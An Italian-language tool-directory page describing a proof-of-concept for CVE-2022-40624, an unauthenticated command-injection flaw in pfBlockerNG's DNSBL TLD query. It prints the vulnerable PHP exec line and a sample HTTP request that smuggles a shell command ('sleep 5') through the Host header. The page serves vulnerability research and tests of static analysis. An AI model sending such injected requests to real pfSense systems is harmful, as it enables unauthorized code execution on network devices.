Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

Proof-of-concept exploit per l'esecuzione remota di codice non autenticata in pfBlockerNg tramite input non sanificato nella funzione di query DNSBL TLD, con analisi di rilevamento SAST.

Vedi Repository
223 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

pfBlockerNg-CVE-2022-40624

Contesto

pfBlockerNG è la nuova generazione di pfBlocker con le seguenti funzionalità:

  1. Gestire le origini degli elenchi IPv4/v6 nei formati 'Deny, Permit o Match'.
  2. Database GeoIP di MaxMind Inc. (versione gratuita GeoLite2).
  3. Miglioramenti di deduplicazione, soppressione e reputazione.
  4. Possibilità di scaricare da diversi formati di elenco.
  5. Integrazione avanzata per le sorgenti di minaccia di reputazione IP Proofpoint ET IQRisk.
  6. Blocco dei nomi di dominio (DNSBL) tramite il resolver DNS Unbound.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

Versioni interessate

pfBlockerNg <2.1.4_27

Vulnerabilità

Esecuzione remota di codice non autenticata (RCE)

La query per la sezione TLD Block di index.php include un input utente non sanitizzato/non escapato d_query proveniente dall'header Host nel sink della funzione PHP exec.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

root@kitploit:~
// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

Sfruttamento

Richiede accesso HTTP alla console web di pfsense Payload di esempio: ' *; sleep 5; '

Richiesta POC:

root@kitploit:~
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

Ispirazione

Adoro pfBlockerNg e sono stato ispirato dalla recente CVE-2022-31814 di Di r00t e dal suo ottimo writeup https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ ed ero curioso di vedere se lo strumento di test statico della sicurezza delle applicazioni (SAST) di Snyk avrebbe rilevato la vulnerabilità. Quindi ho scaricato il corrispondente file index.php versione 2.1.4_26 e ho eseguito Snyk Code su di esso. Effettivamente Snyk ha rilevato la vulnerabilità e un'altra segnalazione simile poche righe dopo.

Scarica lo strumento